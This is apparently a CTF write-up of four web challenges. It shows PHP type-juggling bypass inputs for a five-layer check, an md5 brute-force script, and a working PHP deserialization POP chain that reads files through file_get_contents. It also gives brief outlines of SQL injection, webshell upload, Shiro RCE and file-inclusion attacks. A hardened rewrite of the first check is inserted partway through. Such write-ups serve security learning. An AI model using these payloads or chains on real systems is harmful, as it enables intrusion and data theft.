WEB
0x01 [強網先鋒] 尋寶 (Treasure Hunt)
From the challenge description we know that two KEYs have to be obtained from it, and then the flag.
Challenge source code
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
function filter($string){
    $filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
    $filter_phrase= '/'.implode('|',$filter_word).'/';
    return preg_replace($filter_phrase,'',$string);
}
if($ppp){
    unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";
$ppp['number4'] = '1';
$ppp['number5'] = '1';
extract($_POST);
$num1 = filter($ppp['number1']);
$num2 = filter($ppp['number2']);
$num3 = filter($ppp['number3']);
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);
if(isset($num1) && is_numeric($num1)){
    die("非數字");
}
else{
    if($num1 > 1024){
        echo "第一層";
        if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
            echo "第二層";
            if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
                echo "第三層";
                if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
                    echo "第四層";
                    if(!isset($num5)||(strlen($num5)==0)) die("no");
                    $b=json_decode(@$num5);
                    if($y = $b === NULL){
                        if($y === true){
                            echo "第五層";
                            include 'KeY1lhv.php';
                            echo $KEY1;
                        }
                    }else{
                        die("no");
                    }
                }else{
                    die("no");
                }
            }else{
                die("no");
            }
        }else{
            die("no");
        }
    }else{
        die("no111");
    }
}
KEY1:
Layer 1: a string comparison; construct $num1=1027a to bypass it.
Layer 2: intval() has to be bypassed; use scientific notation, $num2=6e5.
Layer 3: write a script to brute-force the md5 prefix, $num3=61823470
import hashlib

def md5_encode(num3):
    # first 7 hex characters of the md5 of the candidate string
    return hashlib.md5(num3.encode()).hexdigest()[0:7]

for i in range(60000000,700000000):
    num3 = md5_encode(str(i))
    # print(num3)
    if num3 == '4bf21cd':
        print(i)
        break
Layer 4: bypassed with scientific notation as well; construct $num4=0e00000
Layer 5: json_decode returns NULL when it is given data that is not valid JSON, which satisfies the check; construct $num5=aaa
KEY1 obtained: KEY1{e1e1d3d40573127e9ee0480caf1283d6}
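All five bypasses above depend on PHP comparing or converting strings loosely (string-vs-int comparison, intval() on "6e5", "0e00000" == 0, NULL from json_decode treated as success, plus extract($_POST) overwriting $ppp). The following is an added example, not part of the challenge or this writeup: the same five checks rewritten with strict typing so that those inputs are rejected. The field names and the prefix 4bf21cd come from the source above; the helper names are illustrative.

```php
<?php
// Added example, not from the challenge: hardened version of the five-layer check.

function strict_int(string $s): ?int {
    // FILTER_VALIDATE_INT accepts only an optional sign plus decimal digits within
    // integer range, so "1027a", "6e5" and "0e00000" are rejected up front.
    $v = filter_var($s, FILTER_VALIDATE_INT);
    return $v === false ? null : $v;
}

function check_layers(array $post): array {
    // Read the expected fields by name instead of extract($_POST): the client can
    // no longer inject or overwrite $ppp or any other variable of the script.
    $f = [];
    foreach (['number1', 'number2', 'number3', 'number4', 'number5'] as $k) {
        $f[$k] = isset($post[$k]) && is_string($post[$k]) ? $post[$k] : '';
    }
    $n1 = strict_int($f['number1']);
    $n2 = strict_int($f['number2']);
    $n4 = strict_int($f['number4']);

    return [
        // int compared with int, never a string coerced by the comparison operator
        'layer1' => $n1 !== null && $n1 > 1024,
        // with plain digits, strlen <= 4 caps the value at 9999; the original
        // condition was only reachable through intval("6e5") juggling
        'layer2' => $n2 !== null && strlen($f['number2']) <= 4 && $n2 + 1 > 500000,
        // constant-time comparison of the hash prefix, same === semantics
        'layer3' => hash_equals('4bf21cd', substr(md5($f['number3']), 0, 7)),
        // exact integer zero; no "0e..." strings and no loose == against 0
        'layer4' => $n4 === 0,
        // valid JSON is required and a parse error is a failure, not a pass;
        // the original treated json_decode() returning NULL as success
        'layer5' => json_decode($f['number5']) !== null && json_last_error() === JSON_ERROR_NONE,
    ];
}

// Constructed sample input: the five values used in the writeup above
$writeup_input = [
    'number1' => '1027a', 'number2' => '6e5', 'number3' => '61823470',
    'number4' => '0e00000', 'number5' => 'aaa',
];
var_dump(check_layers($writeup_input));
```

With the writeup's own values, layers 1, 2, 4 and 5 are all rejected because strict_int() and the JSON error check no longer let type juggling stand in for a real number or a real document.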
KEY2:
As the challenge description suggests, download the file with a tool that supports automatic multipart (chunked) downloading.
After extraction you get a large number of docx files.
Opening one at random shows a pile of characters; the guess is that KEY2 sits in one of these files, so write a script to search them.
exp
import os
import docx

for i in range(1,20):
    for j in range(1,20):
        path = "./5.{0}/VR_{1}".format(i,j)
        # skip directory names that do not exist instead of crashing on listdir
        if not os.path.isdir(path):
            continue
        files = os.listdir(path)
        # print(filePath)
        for name in files:
            try:
                fileName = path+"/"+name
                # print(fileName)
                doc = docx.Document(fileName)
                for content in doc.paragraphs:
                    # print(content.text)
                    if "KEY2{" in content.text:
                        print(content.text)
                        print(fileName)
                        break
            except Exception:
                # files that python-docx cannot open are ignored
                pass
KEY2 obtained: KEY2{T5fo0Od618l91SlG6l1l42l3a3ao1nblfsS}
Submit both on the original page to get the flag:
0x02 [強網先鋒] 賭徒 (Gambler)
Following the hint, directory scanning finds www.zip, which contains the source code.
index.php
<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);
class Start
{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
    public function __construct(){
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }
    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }
    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}
class Info
{
    private $phonenumber=123123;
    public $promise='I do';
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }
    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}
class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
    public function __get($name){
        $function = $this->a;
        return $function();
    }
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }
    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}
if(isset($_GET['hello'])){
    unserialize($_GET['hello']);
}else{
    $hi = new Start();
}
?>
Analyzing the source shows this is PHP deserialization; the POP chain is constructed as follows
<?php
error_reporting(1);
class Start
{
    public $name='guest';
    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }
    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag."\n\n";
        return ;
    }
}
class Info
{
    public $promise='I do';
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }
    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}
class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
    public function __get($name){
        $function = $this->a;
        return $function();
    }
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }
    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}
$start=new Start();
$info=new Info();
$room=new Room();
$info->file['filename']=$room;
$start->name=$info;
$room->a=$room;
$room->sth_to_set=$start;
echo serialize($room);
?>
Base64-decode the output to get the flag (note: it is preceded by "hi", which has to be stripped before decoding).
0x03 EasyWeb
A port scan shows that 36842 is also open.
The username field of the login page has SQL injection; running sqlmap against it yields the username and password.
After logging in to the backend, directory scanning finds an upload route.
Craft an upload and connect with AntSword (蟻劍).
After proxying out with ew, scan ports again: a JBoss service is listening on 8006.
Get the flag.
0x04 Hard_Penetration
Shiro RCE. After injecting an in-memory webshell and connecting with Behinder (冰蠍), the current user turns out to be ctf and cannot read the flag, so proxy out with ew and scan ports: port 8005 hosts a PHP site, a CMS built on TP3.1.3 (ThinkPHP), and auditing its source reveals a file inclusion.
Craft a shell and include it.
Connect with AntSword to get the flag.